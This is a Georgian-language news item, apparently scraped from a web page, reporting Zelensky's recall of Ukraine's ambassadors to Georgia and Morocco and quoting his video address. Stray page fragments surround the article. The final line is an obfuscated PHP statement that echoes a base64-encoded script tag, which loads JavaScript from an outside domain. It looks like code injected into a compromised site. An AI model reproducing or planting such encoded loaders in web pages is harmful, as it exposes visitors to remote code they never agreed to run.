celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა ვლოდიმერ ზელენსკიმ საქართველოდან და მაროკოდან ელჩები გაიწვია. ამის შესახებ მან ვიდეომიმართვისას განაცხადა.
 
როგორც პრეზიდენტი აღნიშნავს, უახლოეს მომავალში შედეგებს ელის სამხრეთ ამერიკაში, ახლო აღმოსავლეთში, სამხრეთ-აღმოსავლეთ აზიასა და აფრიკის ქვეყნებში მყოფი უკრაინის წარმომადგენლებისგან, ასევე უკრაინის სამხედრო ატაშეებისგან.
 
"აქტიური დიპლომატიური დღე მქონდა. ეს ემსახურებოდა უკრაინული არმიისთვის სამხედრო დახმარების შეგროვებას, რუსეთის წინააღმდეგ ახალი სანქციების დაწესებას .
თუ ჩვენ ნამდვილად ერთად ვიბრძვით თავისუფლებისთვის და დემოკრატიების დასაცავად, მაშინ ჩვენ გვაქვს უფლება, რომ ამ გარდამტეხ, ძალიან პრინციპულ დროს დახმარება მოვითხოვოთ. ეს არის ტანკები, თვითმფრინავები, საარტილერიო სისტემა. თავისუფლება ტირანიაზე არანაკლებ შეიარაღებული უნდა იყოს.
 
არსებობენ ისეთები, რომლებიც სხვებთან ერთად სახელმწიფოს დასაცავად მოქმედებენ იმისთვის, რომ უკრაინამ თავისი მომავლის არჩევა შეძლოს. ჩვენ ვაფასებთ თითოეული ასეთი ადამიანის ქმედებას. და არიან ისეთები, რომლებიც დროს კარგავენ და მუშაობენ მხოლოდ იმისთვის, რომ თანამდებობაზეი დარჩნენ. დღეს ხელი მოვაწერე, რომ ერთ-ერთი ასეთი ადამიანი, ელჩი, გამოვიწვიო მაროკოდან. ასევე, მივიღე გადაწყვეტილება, დავაბრუნო ელჩი საქართველოდან.დიდი პატივისცემით, თუ არ იქნება იარაღი, არ იქნება სანქციები, არ იქნება შეზღუდვები რუსული ბიზნესისთვის – გთხოვთ, მოძებნეთ სხვა სამსახური.
 
ველოდები კონკრეტულ შედეგებს ლათინური ამერიკიდან, ახლო აღმოსავლეთიდან, ცენტრალური აზიიდან და აფრიკიდან. ანალოგიურს ველოდები სამხედრო ატაშეებისგანაც. დიპლომატიური ფრონტი ერთ-ერთი მნიშვნელოვანი ფრონტია. და ყველამ უნდა იმუშაოს მაქსიმალურად ეფექტურად გამარჯვებისა და უკრაინის არმიის დახმარებისთვის, ისევე როგორც თითოეული ჩვენი ჯარისკაცი ბრძოლის ველზე," - აცხადებს უკრაინის პრეზიდენტი.
721
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");